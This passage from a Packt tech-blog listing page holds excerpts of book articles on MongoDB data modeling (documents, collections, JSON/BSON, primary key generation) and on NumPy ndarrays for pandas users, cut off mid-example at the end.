bootstrapping. Summary You learned a lot in this article about NumPy modules. We covered linear algebra, the Fast Fourier transform, continuous and discrete distributions, and random numbers. Resources for Article: Further resources on this subject: SciPy for Signal Processing [article] Visualization [article] The plot function [article]
Read more
  • 0
  • 0
  • 4499

article-image-documents-and-collections-data-modeling-mongodb
Packt
22 Jun 2015
12 min read
Save for later

Documents and Collections in Data Modeling with MongoDB

Packt
22 Jun 2015
12 min read
In this article by Wilson da Rocha França, author of the book, MongoDB Data Modeling, we will cover documents and collections used in data modeling with MongoDB. (For more resources related to this topic, see here.) Data modeling is a very important process during the conception of an application since this step will help you to define the necessary requirements for the database's construction. This definition is precisely the result of the data understanding acquired during the data modeling process. As previously described, this process, regardless of the chosen data model, is commonly divided into two phases: one that is very close to the user's view and the other that is a translation of this view to a conceptual schema. In the scenario of relational database modeling, the main challenge is to build a robust database from these two phases, with the aim of guaranteeing updates to it with any impact during the application's lifecycle. A big advantage of NoSQL compared to relational databases is that NoSQL databases are more flexible at this point, due to the possibility of a schema-less model that, in theory, can cause less impact on the user's view if a modification in the data model is needed. Despite the flexibility NoSQL offers, it is important to previously know how we will use the data in order to model a NoSQL database. It is a good idea not to plan the data format to be persisted, even in a NoSQL database. Moreover, at first sight, this is the point where database administrators, quite used to the relational world, become more uncomfortable. Relational database standards, such as SQL, brought us a sense of security and stability by setting up rules, norms, and criteria. On the other hand, we will dare to state that this security turned database designers distant of the domain from which the data to be stored is drawn. The same thing happened with application developers. There is a notable divergence of interests among them and database administrators, especially regarding data models. The NoSQL databases practically bring the need for an approximation between database professionals and the applications, and also the need for an approximation between developers and databases. For that reason, even though you may be a data modeler/designer or a database administrator, don't be scared if from now on we address subjects that are out of your comfort zone. Be prepared to start using words common from the application developer's point of view, and add them to your vocabulary. This article will cover the following: Introducing your documents and collections The document's characteristics and structure Introducing documents and collections MongoDB has the document as a basic unity of data. The documents in MongoDB are represented in JavaScript Object Notation (JSON). Collections are groups of documents. Making an analogy, a collection is similar to a table in a relational model and a document is a record in this table. And finally, collections belong to a database in MongoDB. The documents are serialized on disk in a format known as Binary JSON (BSON), a binary representation of a JSON document. An example of a document is: {    "_id": 123456,    "firstName": "John",    "lastName": "Clay",    "age": 25,    "address": {      "streetAddress": "131 GEN. Almério de Moura Street",      "city": "Rio de Janeiro",      "state": "RJ",      "postalCode": "20921060"    },    "phoneNumber":[      {          "type": "home",          "number": "+5521 2222-3333"      },      {          "type": "mobile",          "number": "+5521 9888-7777"      }    ] } Unlike the relational model, where you must declare a table structure, a collection doesn't enforce a certain structure for a document. It is possible that a collection contains documents with completely different structures. We can have, for instance, on the same users collection: {    "_id": "123456",    "username": "johnclay",    "age": 25,    "friends":[      {"username": "joelsant"},      {"username": "adilsonbat"}    ],    "active": true,    "gender": "male" } We can also have: {    "_id": "654321",    "username": "santymonty",    "age": 25,    "active": true,    "gender": "male",    "eyeColor": "brown" } In addition to this, another interesting feature of MongoDB is that not just data is represented by documents. Basically, all user interactions with MongoDB are made through documents. Besides data recording, documents are a means to: Define what data can be read, written, and/or updated in queries Define which fields will be updated Create indexes Configure replication Query the information from the database Before we go deep into the technical details of documents, let's explore their structure. JSON JSON is a text format for the open-standard representation of data and that is ideal for data traffic. To explore the JSON format deeper, you can check ECMA-404 The JSON Data Interchange Standard where the JSON format is fully described. JSON is described by two standards: ECMA-404 and RFC 7159. The first one puts more focus on the JSON grammar and syntax, while the second provides semantic and security considerations. As the name suggests, JSON arises from the JavaScript language. It came about as a solution for object state transfers between the web server and the browser. Despite being part of JavaScript, it is possible to find generators and readers for JSON in almost all the most popular programming languages such as C, Java, and Python. The JSON format is also considered highly friendly and human-readable. JSON does not depend on the platform chosen, and its specification are based on two data structures: A set or group of key/value pairs A value ordered list So, in order to clarify any doubts, let's talk about objects. Objects are a non-ordered collection of key/value pairs that are represented by the following pattern: {    "key" : "value" } In relation to the value ordered list, a collection is represented as follows: ["value1", "value2", "value3"] In the JSON specification, a value can be: A string delimited with " " A number, with or without a sign, on a decimal base (base 10). This number can have a fractional part, delimited by a period (.), or an exponential part followed by e or E Boolean values (true or false) A null value Another object Another value ordered array The following diagram shows us the JSON value structure: Here is an example of JSON code that describes a person: {    "name" : "Han",    "lastname" : "Solo",    "position" : "Captain of the Millenium Falcon",    "species" : "human",    "gender":"male",    "height" : 1.8 } BSON BSON means Binary JSON, which, in other words, means binary-encoded serialization for JSON documents. If you are seeking more knowledge on BSON, I suggest you take a look at the BSON specification on http://bsonspec.org/. If we compare BSON to the other binary formats, BSON has the advantage of being a model that allows you more flexibility. Also, one of its characteristics is that it's lightweight—a feature that is very important for data transport on the Web. The BSON format was designed to be easily navigable and both encoded and decoded in a very efficient way for most of the programming languages that are based on C. This is the reason why BSON was chosen as the data format for MongoDB disk persistence. The types of data representation in BSON are: String UTF-8 (string) Integer 32-bit (int32) Integer 64-bit (int64) Floating point (double) Document (document) Array (document) Binary data (binary) Boolean false (x00 or byte 0000 0000) Boolean true (x01 or byte 0000 0001) UTC datetime (int64)—the int64 is UTC milliseconds since the Unix epoch Timestamp (int64)—this is the special internal type used by MongoDB replication and sharding; the first 4 bytes are an increment, and the last 4 are a timestamp Null value () Regular expression (cstring) JavaScript code (string) JavaScript code w/scope (code_w_s) Min key()—the special type that compares a lower value than all other possible BSON element values Max key()—the special type that compares a higher value than all other possible BSON element values ObjectId (byte*12) Characteristics of documents Before we go into detail about how we must model documents, we need a better understanding of some of its characteristics. These characteristics can determine your decision about how the document must be modeled. The document size We must keep in mind that the maximum length for a BSON document is 16 MB. According to BSON specifications, this length is ideal for data transfers through the Web and to avoid the excessive use of RAM. But this is only a recommendation. Nowadays, a document can exceed the 16 MB length by using GridFS. GridFS allows us to store documents in MongoDB that are larger than the BSON maximum size, by dividing it into parts, or chunks. Each chunk is a new document with 255 K of size. Names and values for a field in a document There are a few things that you must know about names and values for fields in a document. First of all, any field's name in a document is a string. As usual, we have some restrictions on field names. They are: The _id field is reserved for a primary key You cannot start the name using the character $ The name cannot have a null character, or (.) Additionally, documents that have indexed fields must respect the size limit for an indexed field. The values cannot exceed the maximum size of 1,024 bytes. The document primary key As seen in the preceding section, the _id field is reserved for the primary key. By default, this field must be the first one in the document, even when, during an insertion, it is not the first field to be inserted. In these cases, MongoDB moves it to the first position. Also, by definition, it is in this field that a unique index will be created. The _id field can have any value that is a BSON type, except the array. Moreover, if a document is created without an indication of the _id field, MongoDB will automatically create an _id field of the ObjectId type. However, this is not the only option. You can use any value you want to identify your document as long as it is unique. There is another option, that is, generating an auto-incremental value based on a support collection or on an optimistic loop. Support collections In this method, we use a separate collection that will keep the last used value in the sequence. To increment the sequence, first we should query the last used value. After this, we can use the operator $inc to increment the value. There is a collection called system.js that can keep the JavaScript code in order to reuse it. Be careful not to include application logic in this collection. Let's see an example for this method: db.counters.insert(    {      _id: "userid",      seq: 0    } )   function getNextSequence(name) {    var ret = db.counters.findAndModify(          {            query: { _id: name },            update: { $inc: { seq: 1 } },            new: true          }    );    return ret.seq; }   db.users.insert(    {      _id: getNextSequence("userid"),      name: "Sarah C."    } ) The optimistic loop The generation of the _id field by an optimistic loop is done by incrementing each iteration and, after that, attempting to insert it in a new document: function insertDocument(doc, targetCollection) {    while (1) {        var cursor = targetCollection.find( {},         { _id: 1 } ).sort( { _id: -1 } ).limit(1);        var seq = cursor.hasNext() ? cursor.next()._id + 1 : 1;        doc._id = seq;        var results = targetCollection.insert(doc);        if( results.hasWriteError() ) {            if( results.writeError.code == 11000 /* dup key */ )                continue;            else                print( "unexpected error inserting data: " +                 tojson( results ) );        }        break;    } } In this function, the iteration does the following: Searches in targetCollection for the maximum value for _id. Settles the next value for _id. Sets the value on the document to be inserted. Inserts the document. In the case of errors due to duplicated _id fields, the loop repeats itself, or else the iteration ends. The points demonstrated here are the basics to understanding all the possibilities and approaches that this tool can offer. But, although we can use auto-incrementing fields for MongoDB, we must avoid using them because this tool does not scale for a huge data mass. Summary In this article, you saw how to build documents in MongoDB, examined their characteristics, and saw how they are organized into collections. Resources for Article: Further resources on this subject: Apache Solr and Big Data – integration with MongoDB [article] About MongoDB [article] Creating a RESTful API [article]
Read more
  • 0
  • 0
  • 2397

article-image-pandas-data-structures
Packt
22 Jun 2015
25 min read
Save for later

The pandas Data Structures

Packt
22 Jun 2015
25 min read
In this article by Femi Anthony, author of the book, Mastering pandas, starts by taking a tour of NumPy ndarrays, a data structure not in pandas but NumPy. Knowledge of NumPy ndarrays is useful as it forms the foundation for the pandas data structures. Another key benefit of NumPy arrays is that they execute what is known as vectorized operations, which are operations that require traversing/looping on a Python array, much faster. In this article, I will present the material via numerous examples using IPython, a browser-based interface that allows the user to type in commands interactively to the Python interpreter. (For more resources related to this topic, see here.) NumPy ndarrays The NumPy library is a very important package used for numerical computing with Python. Its primary features include the following: The type numpy.ndarray, a homogenous multidimensional array Access to numerous mathematical functions – linear algebra, statistics, and so on Ability to integrate C, C++, and Fortran code For more information about NumPy, see http://www.numpy.org. The primary data structure in NumPy is the array class ndarray. It is a homogeneous multi-dimensional (n-dimensional) table of elements, which are indexed by integers just as a normal array. However, numpy.ndarray (also known as numpy.array) is different from the standard Python array.array class, which offers much less functionality. More information on the various operations is provided at http://scipy-lectures.github.io/intro/numpy/array_object.html. NumPy array creation NumPy arrays can be created in a number of ways via calls to various NumPy methods. NumPy arrays via numpy.array NumPy arrays can be created via the numpy.array constructor directly: In [1]: import numpy as np In [2]: ar1=np.array([0,1,2,3])# 1 dimensional array In [3]: ar2=np.array ([[0,3,5],[2,8,7]]) # 2D array In [4]: ar1 Out[4]: array([0, 1, 2, 3]) In [5]: ar2 Out[5]: array([[0, 3, 5],                [2, 8, 7]]) The shape of the array is given via ndarray.shape: In [5]: ar2.shape Out[5]: (2, 3) The number of dimensions is obtained using ndarray.ndim: In [7]: ar2.ndim Out[7]: 2 NumPy array via numpy.arange ndarray.arange is the NumPy version of Python's range function:In [10]: # produces the integers from 0 to 11, not inclusive of 12            ar3=np.arange(12); ar3 Out[10]: array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]) In [11]: # start, end (exclusive), step size        ar4=np.arange(3,10,3); ar4 Out[11]: array([3, 6, 9]) NumPy array via numpy.linspace ndarray.linspace generates linear evenly spaced elements between the start and the end: In [13]:# args - start element,end element, number of elements        ar5=np.linspace(0,2.0/3,4); ar5 Out[13]:array([ 0., 0.22222222, 0.44444444, 0.66666667]) NumPy array via various other functions These functions include numpy.zeros, numpy.ones, numpy.eye, nrandom.rand, numpy.random.randn, and numpy.empty. The argument must be a tuple in each case. For the 1D array, you can just specify the number of elements, no need for a tuple. numpy.ones The following command line explains the function: In [14]:# Produces 2x3x2 array of 1's.        ar7=np.ones((2,3,2)); ar7 Out[14]: array([[[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]],                [[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]]]) numpy.zeros The following command line explains the function: In [15]:# Produce 4x2 array of zeros.            ar8=np.zeros((4,2));ar8 Out[15]: array([[ 0., 0.],          [ 0., 0.],            [ 0., 0.],            [ 0., 0.]]) numpy.eye The following command line explains the function: In [17]:# Produces identity matrix            ar9 = np.eye(3);ar9 Out[17]: array([[ 1., 0., 0.],            [ 0., 1., 0.],            [ 0., 0., 1.]]) numpy.diag The following command line explains the function: In [18]: # Create diagonal array        ar10=np.diag((2,1,4,6));ar10 Out[18]: array([[2, 0, 0, 0],            [0, 1, 0, 0],            [0, 0, 4, 0],            [0, 0, 0, 6]]) numpy.random.rand The following command line explains the function: In [19]: # Using the rand, randn functions          # rand(m) produces uniformly distributed random numbers with range 0 to m          np.random.seed(100)   # Set seed          ar11=np.random.rand(3); ar11 Out[19]: array([ 0.54340494, 0.27836939, 0.42451759]) In [20]: # randn(m) produces m normally distributed (Gaussian) random numbers            ar12=np.random.rand(5); ar12 Out[20]: array([ 0.35467445, -0.78606433, -0.2318722 ,   0.20797568, 0.93580797]) numpy.empty Using np.empty to create an uninitialized array is a cheaper and faster way to allocate an array, rather than using np.ones or np.zeros (malloc versus. cmalloc). However, you should only use it if you're sure that all the elements will be initialized later: In [21]: ar13=np.empty((3,2)); ar13 Out[21]: array([[ -2.68156159e+154,   1.28822983e-231],                [ 4.22764845e-307,   2.78310358e-309],                [ 2.68156175e+154,   4.17201483e-309]]) numpy.tile The np.tile function allows one to construct an array from a smaller array by repeating it several times on the basis of a parameter: In [334]: np.array([[1,2],[6,7]]) Out[334]: array([[1, 2],                  [6, 7]]) In [335]: np.tile(np.array([[1,2],[6,7]]),3) Out[335]: array([[1, 2, 1, 2, 1, 2],                 [6, 7, 6, 7, 6, 7]]) In [336]: np.tile(np.array([[1,2],[6,7]]),(2,2)) Out[336]: array([[1, 2, 1, 2],                  [6, 7, 6, 7],                  [1, 2, 1, 2],                  [6, 7, 6, 7]]) NumPy datatypes We can specify the type of contents of a numeric array by using the dtype parameter: In [50]: ar=np.array([2,-1,6,3],dtype='float'); ar Out[50]: array([ 2., -1., 6., 3.]) In [51]: ar.dtype Out[51]: dtype('float64') In [52]: ar=np.array([2,4,6,8]); ar.dtype Out[52]: dtype('int64') In [53]: ar=np.array([2.,4,6,8]); ar.dtype Out[53]: dtype('float64') The default dtype in NumPy is float. In the case of strings, dtype is the length of the longest string in the array: In [56]: sar=np.array(['Goodbye','Welcome','Tata','Goodnight']); sar.dtype Out[56]: dtype('S9') You cannot create variable-length strings in NumPy, since NumPy needs to know how much space to allocate for the string. dtypes can also be Boolean values, complex numbers, and so on: In [57]: bar=np.array([True, False, True]); bar.dtype Out[57]: dtype('bool') The datatype of ndarray can be changed in much the same way as we cast in other languages such as Java or C/C++. For example, float to int and so on. The mechanism to do this is to use the numpy.ndarray.astype() function. Here is an example: In [3]: f_ar = np.array([3,-2,8.18])        f_ar Out[3]: array([ 3. , -2. , 8.18]) In [4]: f_ar.astype(int) Out[4]: array([ 3, -2, 8]) More information on casting can be found in the official documentation at http://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.astype.html. NumPy indexing and slicing Array indices in NumPy start at 0, as in languages such as Python, Java, and C++ and unlike in Fortran, Matlab, and Octave, which start at 1. Arrays can be indexed in the standard way as we would index into any other Python sequences: # print entire array, element 0, element 1, last element. In [36]: ar = np.arange(5); print ar; ar[0], ar[1], ar[-1] [0 1 2 3 4] Out[36]: (0, 1, 4) # 2nd, last and 1st elements In [65]: ar=np.arange(5); ar[1], ar[-1], ar[0] Out[65]: (1, 4, 0) Arrays can be reversed using the ::-1 idiom as follows: In [24]: ar=np.arange(5); ar[::-1] Out[24]: array([4, 3, 2, 1, 0]) Multi-dimensional arrays are indexed using tuples of integers: In [71]: ar = np.array([[2,3,4],[9,8,7],[11,12,13]]); ar Out[71]: array([[ 2, 3, 4],                [ 9, 8, 7],                [11, 12, 13]]) In [72]: ar[1,1] Out[72]: 8 Here, we set the entry at row1 and column1 to 5: In [75]: ar[1,1]=5; ar Out[75]: array([[ 2, 3, 4],                [ 9, 5, 7],                [11, 12, 13]]) Retrieve row 2: In [76]: ar[2] Out[76]: array([11, 12, 13]) In [77]: ar[2,:] Out[77]: array([11, 12, 13]) Retrieve column 1: In [78]: ar[:,1] Out[78]: array([ 3, 5, 12]) If an index is specified that is out of bounds of the range of an array, IndexError will be raised: In [6]: ar = np.array([0,1,2]) In [7]: ar[5]    ---------------------------------------------------------------------------    IndexError                 Traceback (most recent call last) <ipython-input-7-8ef7e0800b7a> in <module>()    ----> 1 ar[5]      IndexError: index 5 is out of bounds for axis 0 with size 3 Thus, for 2D arrays, the first dimension denotes rows and the second dimension, the columns. The colon (:) denotes selection across all elements of the dimension. Array slicing Arrays can be sliced using the following syntax: ar[startIndex: endIndex: stepValue]. In [82]: ar=2*np.arange(6); ar Out[82]: array([ 0, 2, 4, 6, 8, 10]) In [85]: ar[1:5:2] Out[85]: array([2, 6]) Note that if we wish to include the endIndex value, we need to go above it, as follows: In [86]: ar[1:6:2] Out[86]: array([ 2, 6, 10]) Obtain the first n-elements using ar[:n]: In [91]: ar[:4] Out[91]: array([0, 2, 4, 6]) The implicit assumption here is that startIndex=0, step=1. Start at element 4 until the end: In [92]: ar[4:] Out[92]: array([ 8, 10]) Slice array with stepValue=3: In [94]: ar[::3] Out[94]: array([0, 6]) To illustrate the scope of indexing in NumPy, let us refer to this illustration, which is taken from a NumPy lecture given at SciPy 2013 and can be found at http://bit.ly/1GxCDpC: Let us now examine the meanings of the expressions in the preceding image: The expression a[0,3:5] indicates the start at row 0, and columns 3-5, where column 5 is not included. In the expression a[4:,4:], the first 4 indicates the start at row 4 and will give all columns, that is, the array [[40, 41,42,43,44,45] [50,51,52,53,54,55]]. The second 4 shows the cutoff at the start of column 4 to produce the array [[44, 45], [54, 55]]. The expression a[:,2] gives all rows from column 2. Now, in the last expression a[2::2,::2], 2::2 indicates that the start is at row 2 and the step value here is also 2. This would give us the array [[20, 21, 22, 23, 24, 25], [40, 41, 42, 43, 44, 45]]. Further, ::2 specifies that we retrieve columns in steps of 2, producing the end result array ([[20, 22, 24], [40, 42, 44]]). Assignment and slicing can be combined as shown in the following code snippet: In [96]: ar Out[96]: array([ 0, 2, 4, 6, 8, 10]) In [100]: ar[:3]=1; ar Out[100]: array([ 1, 1, 1, 6, 8, 10]) In [110]: ar[2:]=np.ones(4);ar Out[110]: array([1, 1, 1, 1, 1, 1]) Array masking Here, NumPy arrays can be used as masks to select or filter out elements of the original array. For example, see the following snippet: In [146]: np.random.seed(10)          ar=np.random.random_integers(0,25,10); ar Out[146]: array([ 9, 4, 15, 0, 17, 25, 16, 17, 8, 9]) In [147]: evenMask=(ar % 2==0); evenMask Out[147]: array([False, True, False, True, False, False, True, False, True, False], dtype=bool) In [148]: evenNums=ar[evenMask]; evenNums Out[148]: array([ 4, 0, 16, 8]) In the following example, we randomly generate an array of 10 integers between 0 and 25. Then, we create a Boolean mask array that is used to filter out only the even numbers. This masking feature can be very useful, say for example, if we wished to eliminate missing values, by replacing them with a default value. Here, the missing value '' is replaced by 'USA' as the default country. Note that '' is also an empty string: In [149]: ar=np.array(['Hungary','Nigeria',                        'Guatemala','','Poland',                        '','Japan']); ar Out[149]: array(['Hungary', 'Nigeria', 'Guatemala',                  '', 'Poland', '', 'Japan'],                  dtype='|S9') In [150]: ar[ar=='']='USA'; ar Out[150]: array(['Hungary', 'Nigeria', 'Guatemala', 'USA', 'Poland', 'USA', 'Japan'], dtype='|S9') Arrays of integers can also be used to index an array to produce another array. Note that this produces multiple values; hence, the output must be an array of type ndarray. This is illustrated in the following snippet: In [173]: ar=11*np.arange(0,10); ar Out[173]: array([ 0, 11, 22, 33, 44, 55, 66, 77, 88, 99]) In [174]: ar[[1,3,4,2,7]] Out[174]: array([11, 33, 44, 22, 77]) In the preceding code, the selection object is a list and elements at indices 1, 3, 4, 2, and 7 are selected. Now, assume that we change it to the following: In [175]: ar[1,3,4,2,7] We get an IndexError error since the array is 1D and we're specifying too many indices to access it. IndexError         Traceback (most recent call last) <ipython-input-175-adbcbe3b3cdc> in <module>() ----> 1 ar[1,3,4,2,7]   IndexError: too many indices This assignment is also possible with array indexing, as follows: In [176]: ar[[1,3]]=50; ar Out[176]: array([ 0, 50, 22, 50, 44, 55, 66, 77, 88, 99]) When a new array is created from another array by using a list of array indices, the new array has the same shape. Complex indexing Here, we illustrate the use of complex indexing to assign values from a smaller array into a larger one: In [188]: ar=np.arange(15); ar Out[188]: array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])   In [193]: ar2=np.arange(0,-10,-1)[::-1]; ar2 Out[193]: array([-9, -8, -7, -6, -5, -4, -3, -2, -1, 0]) Slice out the first 10 elements of ar, and replace them with elements from ar2, as follows: In [194]: ar[:10]=ar2; ar Out[194]: array([-9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 10, 11, 12, 13, 14]) Copies and views A view on a NumPy array is just a particular way of portraying the data it contains. Creating a view does not result in a new copy of the array, rather the data it contains may be arranged in a specific order, or only certain data rows may be shown. Thus, if data is replaced on the underlying array's data, this will be reflected in the view whenever the data is accessed via indexing. The initial array is not copied into the memory during slicing and is thus more efficient. The np.may_share_memory method can be used to see if two arrays share the same memory block. However, it should be used with caution as it may produce false positives. Modifying a view modifies the original array: In [118]:ar1=np.arange(12); ar1 Out[118]:array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])   In [119]:ar2=ar1[::2]; ar2 Out[119]: array([ 0, 2, 4, 6, 8, 10])   In [120]: ar2[1]=-1; ar1 Out[120]: array([ 0, 1, -1, 3, 4, 5, 6, 7, 8, 9, 10, 11]) To force NumPy to copy an array, we use the np.copy function. As we can see in the following array, the original array remains unaffected when the copied array is modified: In [124]: ar=np.arange(8);ar Out[124]: array([0, 1, 2, 3, 4, 5, 6, 7])   In [126]: arc=ar[:3].copy(); arc Out[126]: array([0, 1, 2])   In [127]: arc[0]=-1; arc Out[127]: array([-1, 1, 2])   In [128]: ar Out[128]: array([0, 1, 2, 3, 4, 5, 6, 7]) Operations Here, we present various operations in NumPy. Basic operations Basic arithmetic operations work element-wise with scalar operands. They are - +, -, *, /, and **. In [196]: ar=np.arange(0,7)*5; ar Out[196]: array([ 0, 5, 10, 15, 20, 25, 30])   In [198]: ar=np.arange(5) ** 4 ; ar Out[198]: array([ 0,   1, 16, 81, 256])   In [199]: ar ** 0.5 Out[199]: array([ 0.,   1.,   4.,   9., 16.]) Operations also work element-wise when another array is the second operand as follows: In [209]: ar=3+np.arange(0, 30,3); ar Out[209]: array([ 3, 6, 9, 12, 15, 18, 21, 24, 27, 30])   In [210]: ar2=np.arange(1,11); ar2 Out[210]: array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) Here, in the following snippet, we see element-wise subtraction, division, and multiplication: In [211]: ar-ar2 Out[211]: array([ 2, 4, 6, 8, 10, 12, 14, 16, 18, 20])   In [212]: ar/ar2 Out[212]: array([3, 3, 3, 3, 3, 3, 3, 3, 3, 3])   In [213]: ar*ar2 Out[213]: array([ 3, 12, 27, 48, 75, 108, 147, 192, 243, 300]) It is much faster to do this using NumPy rather than pure Python. The %timeit function in IPython is known as a magic function and uses the Python timeit module to time the execution of a Python statement or expression, explained as follows: In [214]: ar=np.arange(1000)          %timeit a**3          100000 loops, best of 3: 5.4 µs per loop   In [215]:ar=range(1000)          %timeit [ar[i]**3 for i in ar]          1000 loops, best of 3: 199 µs per loop Array multiplication is not the same as matrix multiplication; it is element-wise, meaning that the corresponding elements are multiplied together. For matrix multiplication, use the dot operator. For more information refer to http://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html. In [228]: ar=np.array([[1,1],[1,1]]); ar Out[228]: array([[1, 1],                  [1, 1]])   In [230]: ar2=np.array([[2,2],[2,2]]); ar2 Out[230]: array([[2, 2],                  [2, 2]])   In [232]: ar.dot(ar2) Out[232]: array([[4, 4],                  [4, 4]]) Comparisons and logical operations are also element-wise: In [235]: ar=np.arange(1,5); ar Out[235]: array([1, 2, 3, 4])   In [238]: ar2=np.arange(5,1,-1);ar2 Out[238]: array([5, 4, 3, 2])   In [241]: ar < ar2 Out[241]: array([ True, True, False, False], dtype=bool)   In [242]: l1 = np.array([True,False,True,False])          l2 = np.array([False,False,True, False])          np.logical_and(l1,l2) Out[242]: array([False, False, True, False], dtype=bool) Other NumPy operations such as log, sin, cos, and exp are also element-wise: In [244]: ar=np.array([np.pi, np.pi/2]); np.sin(ar) Out[244]: array([ 1.22464680e-16,   1.00000000e+00]) Note that for element-wise operations on two NumPy arrays, the two arrays must have the same shape, else an error will result since the arguments of the operation must be the corresponding elements in the two arrays: In [245]: ar=np.arange(0,6); ar Out[245]: array([0, 1, 2, 3, 4, 5])   In [246]: ar2=np.arange(0,8); ar2 Out[246]: array([0, 1, 2, 3, 4, 5, 6, 7])   In [247]: ar*ar2          ---------------------------------------------------------------------------          ValueError                              Traceback (most recent call last)          <ipython-input-247-2c3240f67b63> in <module>()          ----> 1 ar*ar2          ValueError: operands could not be broadcast together with shapes (6) (8) Further, NumPy arrays can be transposed as follows: In [249]: ar=np.array([[1,2,3],[4,5,6]]); ar Out[249]: array([[1, 2, 3],                  [4, 5, 6]])   In [250]:ar.T Out[250]:array([[1, 4],                [2, 5],                [3, 6]])   In [251]: np.transpose(ar) Out[251]: array([[1, 4],                 [2, 5],                  [3, 6]]) Suppose we wish to compare arrays not element-wise, but array-wise. We could achieve this as follows by using the np.array_equal operator: In [254]: ar=np.arange(0,6)          ar2=np.array([0,1,2,3,4,5])          np.array_equal(ar, ar2) Out[254]: True Here, we see that a single Boolean value is returned instead of a Boolean array. The value is True only if all the corresponding elements in the two arrays match. The preceding expression is equivalent to the following: In [24]: np.all(ar==ar2) Out[24]: True Reduction operations Operators such as np.sum and np.prod perform reduces on arrays; that is, they combine several elements into a single value: In [257]: ar=np.arange(1,5)          ar.prod() Out[257]: 24 In the case of multi-dimensional arrays, we can specify whether we want the reduction operator to be applied row-wise or column-wise by using the axis parameter: In [259]: ar=np.array([np.arange(1,6),np.arange(1,6)]);ar Out[259]: array([[1, 2, 3, 4, 5],                 [1, 2, 3, 4, 5]]) # Columns In [261]: np.prod(ar,axis=0) Out[261]: array([ 1, 4, 9, 16, 25]) # Rows In [262]: np.prod(ar,axis=1) Out[262]: array([120, 120]) In the case of multi-dimensional arrays, not specifying an axis results in the operation being applied to all elements of the array as explained in the following example: In [268]: ar=np.array([[2,3,4],[5,6,7],[8,9,10]]); ar.sum() Out[268]: 54   In [269]: ar.mean() Out[269]: 6.0 In [271]: np.median(ar) Out[271]: 6.0 Statistical operators These operators are used to apply standard statistical operations to a NumPy array. The names are self-explanatory: np.std(), np.mean(), np.median(), and np.cumsum(). In [309]: np.random.seed(10)          ar=np.random.randint(0,10, size=(4,5));ar Out[309]: array([[9, 4, 0, 1, 9],                  [0, 1, 8, 9, 0],                  [8, 6, 4, 3, 0],                  [4, 6, 8, 1, 8]]) In [310]: ar.mean() Out[310]: 4.4500000000000002   In [311]: ar.std() Out[311]: 3.4274626183227732   In [312]: ar.var(axis=0) # across rows Out[312]: array([ 12.6875,   4.1875, 11.   , 10.75 , 18.1875])   In [313]: ar.cumsum() Out[313]: array([ 9, 13, 13, 14, 23, 23, 24, 32, 41, 41, 49, 55,                  59, 62, 62, 66, 72, 80, 81, 89]) Logical operators Logical operators can be used for array comparison/checking. They are as follows: np.all(): This is used for element-wise and all of the elements np.any(): This is used for element-wise or all of the elements Generate a random 4 × 4 array of ints and check if any element is divisible by 7 and if all elements are less than 11: In [320]: np.random.seed(100)          ar=np.random.randint(1,10, size=(4,4));ar Out[320]: array([[9, 9, 4, 8],                  [8, 1, 5, 3],                  [6, 3, 3, 3],                  [2, 1, 9, 5]])   In [318]: np.any((ar%7)==0) Out[318]: False   In [319]: np.all(ar<11) Out[319]: True Broadcasting In broadcasting, we make use of NumPy's ability to combine arrays that don't have the same exact shape. Here is an example: In [357]: ar=np.ones([3,2]); ar Out[357]: array([[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]])   In [358]: ar2=np.array([2,3]); ar2 Out[358]: array([2, 3])   In [359]: ar+ar2 Out[359]: array([[ 3., 4.],                  [ 3., 4.],                  [ 3., 4.]]) Thus, we can see that ar2 is broadcasted across the rows of ar by adding it to each row of ar producing the preceding result. Here is another example, showing that broadcasting works across dimensions: In [369]: ar=np.array([[23,24,25]]); ar Out[369]: array([[23, 24, 25]]) In [368]: ar.T Out[368]: array([[23],                  [24],                  [25]]) In [370]: ar.T+ar Out[370]: array([[46, 47, 48],                  [47, 48, 49],                  [48, 49, 50]]) Here, both row and column arrays were broadcasted and we ended up with a 3 × 3 array. Array shape manipulation There are a number of steps for the shape manipulation of arrays. Flattening a multi-dimensional array The np.ravel() function allows you to flatten a multi-dimensional array as follows: In [385]: ar=np.array([np.arange(1,6), np.arange(10,15)]); ar Out[385]: array([[ 1, 2, 3, 4, 5],                  [10, 11, 12, 13, 14]])   In [386]: ar.ravel() Out[386]: array([ 1, 2, 3, 4, 5, 10, 11, 12, 13, 14])   In [387]: ar.T.ravel() Out[387]: array([ 1, 10, 2, 11, 3, 12, 4, 13, 5, 14]) You can also use np.flatten, which does the same thing, except that it returns a copy while np.ravel returns a view. Reshaping The reshape function can be used to change the shape of or unflatten an array: In [389]: ar=np.arange(1,16);ar Out[389]: array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]) In [390]: ar.reshape(3,5) Out[390]: array([[ 1, 2, 3, 4, 5],                  [ 6, 7, 8, 9, 10],                 [11, 12, 13, 14, 15]]) The np.reshape function returns a view of the data, meaning that the underlying array remains unchanged. In special cases, however, the shape cannot be changed without the data being copied. For more details on this, see the documentation at http://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html. Resizing There are two resize operators, numpy.ndarray.resize, which is an ndarray operator that resizes in place, and numpy.resize, which returns a new array with the specified shape. Here, we illustrate the numpy.ndarray.resize function: In [408]: ar=np.arange(5); ar.resize((8,));ar Out[408]: array([0, 1, 2, 3, 4, 0, 0, 0]) Note that this function only works if there are no other references to this array; else, ValueError results: In [34]: ar=np.arange(5);          ar Out[34]: array([0, 1, 2, 3, 4]) In [35]: ar2=ar In [36]: ar.resize((8,)); --------------------------------------------------------------------------- ValueError                                Traceback (most recent call last) <ipython-input-36-394f7795e2d1> in <module>() ----> 1 ar.resize((8,));   ValueError: cannot resize an array that references or is referenced by another array in this way. Use the resize function The way around this is to use the numpy.resize function instead: In [38]: np.resize(ar,(8,)) Out[38]: array([0, 1, 2, 3, 4, 0, 1, 2]) Adding a dimension The np.newaxis function adds an additional dimension to an array: In [377]: ar=np.array([14,15,16]); ar.shape Out[377]: (3,) In [378]: ar Out[378]: array([14, 